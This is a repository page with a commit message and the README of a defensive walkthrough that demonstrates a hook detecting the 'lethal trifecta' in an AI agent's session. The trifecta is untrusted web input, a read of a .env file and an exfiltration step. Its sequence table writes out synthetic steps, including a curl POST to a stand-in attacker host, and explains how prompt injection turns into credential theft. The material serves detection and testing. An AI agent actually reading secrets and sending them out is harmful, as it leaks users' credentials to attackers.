ktg-plugin-marketplace/plugins/llm-security/examples/lethal-trifecta-walkthrough
Kjell Tore Guttormsen 583a78c6cc feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]
Companion to 8df5d5c (which only carried the doc updates — the example
directories themselves were left out of staging by mistake). This
commit adds the actual example mappes:

- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs,
  expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs,
  expected-findings.md}

Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section
with a 4-row table covering malicious-skill-demo, prompt-injection-
showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the
state-isolation discipline notes.

Marketplace root README unchanged since plugin's outward coverage
is unchanged ([skip-docs] covers the marketplace-level gate).
2026-05-05 14:45:39 +02:00
..
expected-findings.md feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs] 2026-05-05 14:45:39 +02:00
README.md feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs] 2026-05-05 14:45:39 +02:00
run-trifecta.mjs feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs] 2026-05-05 14:45:39 +02:00

Lethal Trifecta Walkthrough

WARNING: This is a security demonstration fixture, NOT a real attack. All payloads are synthetic. No external network is contacted, no real file is read, no real command is executed. The script only feeds JSON payloads to one of llm-security's hook scripts.

What this demonstrates

The Rule of Two (Meta, Oct 2025): an agent must never simultaneously hold all three of:

  1. Untrusted input — content the model didn't author (web pages, MCP output, document uploads, prompt injection surface)
  2. Sensitive data access — files like .env, .ssh/, .aws/, credential stores
  3. Exfiltration sink — a path off the box (HTTP POST, scp, paste sites)

Any two are acceptable. All three at once is the lethal trifecta (Simon Willison / Invariant Labs framing) — at that point, prompt injection becomes credential theft.

post-session-guard.mjs (PostToolUse hook on every tool) tracks tool calls in a 20-call sliding window and emits a SECURITY ADVISORY when all three classes appear. This walkthrough shows it firing on a 5-step sequence.

Sequence

# Tool Class Advisory?
1 WebFetch input_source no — only one class
2 Read /path/.env data_access (sensitive) no — only two classes
3 Bash curl -X POST attacker/... exfil_sink YES — trifecta closes
4 Bash ls -la neutral no — already warned in window
5 Bash curl -X POST attacker/... exfil_sink no — suppressed

The advisory at step 3 lists the evidence and recommends remediations (disable HTTP exfil, gate sensitive-path reads, narrow tool surface). Step 4-5 are present to show suppression: post-session-guard writes a warning marker into the state file so the operator isn't spammed by the same trifecta repeating within the window.

How to run

cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs

# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose

Expected: 5 pass, 0 fail and a SECURITY ADVISORY (session-guard) preview after step 3.

Hooks / scanners involved

  • hooks/scripts/post-session-guard.mjs — the only hook invoked. Configurable via policy.json trifecta.mode (block / warn / off; default warn) or env var LLM_SECURITY_TRIFECTA_MODE.

This example uses mode: warn (default). In block mode the third call's advisory becomes a hard block (exit 2) and the agent action is denied — see docs/security-hardening-guide.md §3 for when to switch.

OWASP / framework mapping

Code Framework Why
LLM01 OWASP LLM Top 10 (2025) Prompt injection lands via the input_source leg
LLM02 OWASP LLM Top 10 (2025) Sensitive output disclosure (the .env exfil)
ASI01 OWASP Agentic Top 10 Excessive Agency — agent holds all three capabilities
ASI02 OWASP Agentic Top 10 Agent Data Leakage — exfil sink + sensitive read

State isolation

post-session-guard stores per-session state at ${os.tmpdir()}/llm-security-session-${ppid}.jsonl. Because all five hook invocations are spawned by the same run-trifecta.mjs process, they share that script's PID as their parent PID — so the entire walkthrough lives in a single state file. The script deletes the file in a finally block before exiting. Your real session state under /tmp/ is never touched.

Limitations

  • The walkthrough demonstrates the primary 20-call sliding-window trifecta. It does not exercise the 100-call slow-burn variant (SLOW_BURN_MIN_SPREAD = 50), the MCP-concentrated variant (all three legs from the same MCP server), behavioral drift via Jensen-Shannon divergence, or volume-threshold advisories. Those have their own unit tests under tests/lib/post-session-guard.*.
  • This is deterministic detection. It does not exercise the block-mode exit-2 path — flip LLM_SECURITY_TRIFECTA_MODE=block and re-run if you want to see the script fail at step 3.

See also

  • docs/security-hardening-guide.md §3 — Rule of Two and configuration
  • knowledge/owasp-agentic-top10.md — ASI01 / ASI02 background
  • knowledge/deepmind-agent-traps.md — adjacent attack categories
  • examples/prompt-injection-showcase/ — the input_source leg in isolation
  • expected-findings.md (in this folder) — the testable contract